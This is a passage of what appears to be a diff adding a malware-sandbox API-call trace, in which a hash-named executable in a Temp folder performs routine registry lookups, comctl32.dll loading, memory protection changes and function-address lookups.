"value": "0x0000029c" + } + ], + "repeated": 0, + "id": 274 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000008", + "pretty_value": "KEY_ENUMERATE_SUB_KEYS" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots" + } + ], + "repeated": 0, + "id": 275 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe.Local\\" + } + ], + "repeated": 0, + "id": 276 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000029c" + }, + { + "name": "DesiredAccess", + "value": "0x00100020", + "pretty_value": "FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984" + }, + { + "name": "ShareAccess", + "value": "3", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" + } + ], + "repeated": 0, + "id": 277 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0073d000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 278 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\\comctl32.dll" + } + ], + "repeated": 0, + "id": 279 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002a0" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\\comctl32.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 280 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002a4" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000002a0" + } + ], + "repeated": 0, + "id": 281 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002a4" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73af0000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00210000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 282 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73ca0000" + }, + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 283 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 284 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 285 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73c9b000" + }, + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 286 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73c9b000" + }, + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 287 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtSetInformationProcess", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessInformationClass", + "value": "35" + }, + { + "name": "ProcessInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00r\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x003\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00r\\x00-\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00-\\x000\\x00" + } + ], + "repeated": 0, + "id": 288 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002a4" + } + ], + "repeated": 0, + "id": 289 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002a0" + } + ], + "repeated": 0, + "id": 290 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 291 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 292 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 293 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\\comctl32" + }, + { + "name": "DllBase", + "value": "0x73af0000" + } + ], + "repeated": 0, + "id": 294 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000298" + }, + { + "name": "DesiredAccess", + "value": "0x001200a9", + "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\WindowsShell.Manifest" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 295 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002a4" + }, + { + "name": "DesiredAccess", + "value": "0x00000004", + "pretty_value": "SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000298" + } + ], + "repeated": 0, + "id": 296 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002a4" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02580000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 297 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000002a8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" + } + ], + "repeated": 0, + "id": 298 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000002a8" + }, + { + "name": "ValueName", + "value": "PreferExternalManifest" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest" + } + ], + "repeated": 0, + "id": 299 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002a8" + } + ], + "repeated": 0, + "id": 300 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtQueryInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000298" + }, + { + "name": "HandleName", + "value": "C:\\Windows\\WindowsShell.Manifest" + }, + { + "name": "FileInformationClass", + "value": "5", + "pretty_value": "FileStandardInformation" + }, + { + "name": "FileInformation", + "value": "\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x9e\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 301 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "__notification__", + "api": "sysenter", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadIdentifier", + "value": "9440" + }, + { + "name": "Module", + "value": "KERNEL32.DLL" + }, + { + "name": "Return Address", + "value": "0x76112b4c" + } + ], + "repeated": 0, + "id": 302 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000298" + } + ], + "repeated": 0, + "id": 303 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002a4" + } + ], + "repeated": 0, + "id": 304 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02580000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 305 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "synchronization", + "api": "NtAddAtomEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "AtomName", + "value": "ThemePropScrollBarCtl" + }, + { + "name": "Atom", + "value": "0x0000c01b" + } + ], + "repeated": 0, + "id": 306 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "synchronization", + "api": "NtAddAtomEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "AtomName", + "value": "MicrosoftTabletPenServiceProperty" + }, + { + "name": "Atom", + "value": "0x0000c01c" + } + ], + "repeated": 0, + "id": 307 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00001022" + }, + { + "name": "uiParam", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 308 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "LPK" + }, + { + "name": "ModuleHandle", + "value": "0x0049414e" + } + ], + "repeated": 0, + "id": 309 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "GDI32" + }, + { + "name": "ModuleHandle", + "value": "0x76fa0000" + } + ], + "repeated": 0, + "id": 310 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76fa0000" + }, + { + "name": "FunctionName", + "value": "LpkEditControl" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76fbd440" + } + ], + "repeated": 0, + "id": 311 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\\comctl32" + }, + { + "name": "BaseAddress", + "value": "0x73af0000" + }, + { + "name": "InitRoutine", + "value": "0x73b754e0" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 312 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "HIMAGELIST_QueryInterface" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b4ee70" + } + ], + "repeated": 0, + "id": 313 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "DrawShadowText" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73bb8500" + } + ], + "repeated": 0, + "id": 314 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "DrawSizeBox" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b66db0" + } + ], + "repeated": 0, + "id": 315 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "DrawScrollBar" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b67780" + } + ], + "repeated": 0, + "id": 316 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "SizeBoxHwnd" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b6a240" + } + ], + "repeated": 0, + "id": 317 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "ScrollBar_MouseMove" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73bb0df0" + } + ], + "repeated": 0, + "id": 318 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "ScrollBar_Menu" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73bb0c30" + } + ], + "repeated": 0, + "id": 319 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "HandleScrollCmd" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73bb0ba0" + } + ], + "repeated": 0, + "id": 320 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "DetachScrollBars" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b66f40" + } + ], + "repeated": 0, + "id": 321 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "AttachScrollBars" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b66f20" + } + ], + "repeated": 0, + "id": 322 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "CCSetScrollInfo" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b68190" + } + ], + "repeated": 0, + "id": 323 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "CCGetScrollInfo" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b6c220" + } + ], + "repeated": 0, + "id": 324 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "CCEnableScrollBar" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73b255e0" + } + ], + "repeated": 0, + "id": 325 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73af0000" + }, + { + "name": "FunctionName", + "value": "QuerySystemGestureStatus" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73bb0be0" + } + ], + "repeated": 0, + "id": 326 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73ca0000" + }, + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": 